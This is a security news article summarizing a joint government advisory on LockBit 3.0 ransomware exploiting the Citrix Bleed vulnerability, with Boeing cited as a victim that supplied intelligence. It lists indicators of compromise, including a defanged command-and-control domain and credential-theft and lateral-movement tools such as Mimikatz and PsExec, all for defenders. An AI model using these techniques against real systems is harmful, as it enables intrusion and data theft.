Boeing Supplements CISA Advisory for LockBit's Abuse of Citrix Bleed Vulnerability

A collaborative effort by the Cybersecurity and Infrastructure Security Agency (CISA), Federal Bureau of Investigation (FBI), Multi-State Information Sharing & Analysis Center (MS-ISAC), and Australian Signals Directorate’s Australian Cyber Security Center (ASD’s ACSC) has resulted in a comprehensive Cybersecurity Advisory (CSA) addressing the critical threat posed by LockBit 3.0 ransomware exploiting CVE-2023-4966, known as Citrix Bleed. This advisory was aided by intelligence from victim organizations including Boeing a recent victim of LockBit exploiting the vulnerability to gain initial access to Boeing Distribution Inc's parts and distribution business.

Citrix Bleed, identified as the vector for LockBit 3.0 attacks, enables threat actors to "bypass password requirements and multifactor authentication (MFA), leading to successful session hijacking of legitimate user sessions on Citrix NetScaler web application delivery control (ADC) and Gateway appliances." The cybersecurity advisory outlines Indicators of Compromise (IOCs) and Tactics, Techniques, and Procedures (TTPs) obtained from multiple sources, including Boeing, to equip network administrators with essential information to mitigate the risk. The vulnerability, disclosed by Citrix on October 10, 2023, affects various software versions, making prompt application of patches crucial.

Exploitation of CVE-2023-4966 is reported to have been exploited since August 2023. LockBit 3.0 affiliates, upon gaining access, use a PowerShell script to execute a malicious Dynamic Link Library (DLL) file. This DLL, executed through rundll32, attempts to communicate with a suspicious domain, adobe-usupdatefiles[.]digital which "have no association with legitimate Adobe software and no identified interaction with the software," CISA explains. Additional TTPs exhibited include the deployment of remote management tools, Batch and PowerShell scripts, and HTA files using native Windows utilities. Suspicious use of the MSHTA utility with HTTP parameters is called out in the advisory along with listing tools commonly found in LockBit's campaigns including Plink, Mimikatz, Procdump, PsExec and suspicious access of Windows admin shares.

Coverage of the Critix Bleed abuse is also reported by security researcher Kevin Beaumont on Mastodon having identified multiple instances of vulnerable Citrix appliances coinciding with breach reports from the Industrial and Commercial Bank of China (ICBC), DP World, and Allen & Overy. Beaumont's report also warns of visibility gaps in logging as the "initial exploitation has no logs at all as Citrix Netscaler/Gateway fails to log the exploit request." Due to the vulnerability's ease of exploitation, the joint advisory and Beaumont’s report, emphasize the urgent need for network administrators to apply provided mitigations, including isolating affected appliances and applying necessary software updates.